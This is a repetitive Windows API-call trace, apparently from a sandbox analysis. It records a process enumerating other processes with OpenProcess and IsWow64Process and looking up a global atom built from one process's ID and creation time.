	[0118.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.912] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.912] CloseHandle (hObject=0x698) returned 1
	[0118.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.912] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.912] CloseHandle (hObject=0x698) returned 1
	[0118.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.912] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.912] CloseHandle (hObject=0x698) returned 1
	[0118.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.912] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.912] CloseHandle (hObject=0x698) returned 1
	[0118.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.912] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.912] CloseHandle (hObject=0x698) returned 1
	[0118.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.913] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.913] CloseHandle (hObject=0x698) returned 1
	[0118.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.913] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.913] CloseHandle (hObject=0x698) returned 1
	[0118.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.913] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.913] CloseHandle (hObject=0x698) returned 1
	[0118.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.914] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.914] CloseHandle (hObject=0x698) returned 1
	[0118.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.914] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.914] CloseHandle (hObject=0x698) returned 1
	[0118.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.914] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.914] CloseHandle (hObject=0x698) returned 1
	[0118.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.914] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.914] CloseHandle (hObject=0x698) returned 1
	[0118.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.914] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.914] CloseHandle (hObject=0x698) returned 1
	[0118.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.915] CloseHandle (hObject=0x698) returned 1
	[0118.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.915] CloseHandle (hObject=0x698) returned 1
	[0118.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.915] CloseHandle (hObject=0x698) returned 1
	[0118.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.915] CloseHandle (hObject=0x698) returned 1
	[0118.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.915] CloseHandle (hObject=0x698) returned 1
	[0118.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.916] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.916] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.916] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.916] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.917] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.917] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.917] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.917] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.917] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.917] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.917] CloseHandle (hObject=0x698) returned 1
	[0118.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.917] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.918] CloseHandle (hObject=0x698) returned 1
	[0118.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.918] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.918] CloseHandle (hObject=0x698) returned 1
	[0118.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.918] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.918] CloseHandle (hObject=0x698) returned 1
	[0119.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0119.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.055] CloseHandle (hObject=0x698) returned 1
	[0119.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.055] CloseHandle (hObject=0x698) returned 1
	[0119.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0119.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.056] CloseHandle (hObject=0x698) returned 1
	[0119.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.056] CloseHandle (hObject=0x698) returned 1
	[0119.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.056] CloseHandle (hObject=0x698) returned 1
	[0119.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.056] CloseHandle (hObject=0x698) returned 1
	[0119.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.056] CloseHandle (hObject=0x698) returned 1
	[0119.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.057] CloseHandle (hObject=0x698) returned 1
	[0119.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.057] CloseHandle (hObject=0x698) returned 1
	[0119.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.057] CloseHandle (hObject=0x698) returned 1
	[0119.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.058] CloseHandle (hObject=0x698) returned 1
	[0119.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.058] CloseHandle (hObject=0x698) returned 1
	[0119.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.058] CloseHandle (hObject=0x698) returned 1
	[0119.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.058] CloseHandle (hObject=0x698) returned 1
	[0119.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.058] CloseHandle (hObject=0x698) returned 1
	[0119.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.059] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.059] CloseHandle (hObject=0x698) returned 1
	[0119.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.059] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.059] CloseHandle (hObject=0x698) returned 1
	[0119.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.059] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.059] CloseHandle (hObject=0x698) returned 1
	[0119.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.073] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.073] CloseHandle (hObject=0x698) returned 1
	[0119.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.074] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.074] CloseHandle (hObject=0x698) returned 1
	[0119.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0119.074] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.074] CloseHandle (hObject=0x698) returned 1
	[0119.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.074] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.074] CloseHandle (hObject=0x698) returned 1
	[0119.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.074] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.074] CloseHandle (hObject=0x698) returned 1
	[0119.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.074] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.074] CloseHandle (hObject=0x698) returned 1
	[0119.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.077] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.077] CloseHandle (hObject=0x698) returned 1
	[0119.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.079] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.079] CloseHandle (hObject=0x698) returned 1
	[0119.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.079] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.079] CloseHandle (hObject=0x698) returned 1
	[0119.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.080] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.080] CloseHandle (hObject=0x698) returned 1
	[0119.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.080] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.080] CloseHandle (hObject=0x698) returned 1
	[0119.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.080] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.080] CloseHandle (hObject=0x698) returned 1
	[0119.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.080] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.080] CloseHandle (hObject=0x698) returned 1
	[0119.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.167] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.167] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.167] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.167] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.167] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.167] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.168] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.168] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.168] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.168] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.168] CloseHandle (hObject=0x698) returned 1
	[0119.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.168] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.168] CloseHandle (hObject=0x698) returned 1
	[0119.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.169] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.169] CloseHandle (hObject=0x698) returned 1
	[0119.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.169] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.169] CloseHandle (hObject=0x698) returned 1
	[0119.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0119.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.213] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.213] CloseHandle (hObject=0x698) returned 1
	[0119.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.213] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.213] CloseHandle (hObject=0x698) returned 1
	[0119.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0119.214] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.214] CloseHandle (hObject=0x698) returned 1
	[0119.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.214] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.214] CloseHandle (hObject=0x698) returned 1
	[0119.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.214] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.214] CloseHandle (hObject=0x698) returned 1
	[0119.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.214] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.214] CloseHandle (hObject=0x698) returned 1
	[0119.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.214] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.214] CloseHandle (hObject=0x698) returned 1
	[0119.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.215] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.215] CloseHandle (hObject=0x698) returned 1
	[0119.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.215] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.215] CloseHandle (hObject=0x698) returned 1
	[0119.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.215] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.215] CloseHandle (hObject=0x698) returned 1
	[0119.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.215] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.215] CloseHandle (hObject=0x698) returned 1
	[0119.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.216] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.216] CloseHandle (hObject=0x698) returned 1
	[0119.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.216] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.216] CloseHandle (hObject=0x698) returned 1
	[0119.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.216] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.216] CloseHandle (hObject=0x698) returned 1
	[0119.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.216] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.216] CloseHandle (hObject=0x698) returned 1
	[0119.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.217] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.217] CloseHandle (hObject=0x698) returned 1
	[0119.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.217] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.217] CloseHandle (hObject=0x698) returned 1
	[0119.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.217] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.217] CloseHandle (hObject=0x698) returned 1
	[0119.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.221] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.221] CloseHandle (hObject=0x698) returned 1
	[0119.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.221] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.221] CloseHandle (hObject=0x698) returned 1
	[0119.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
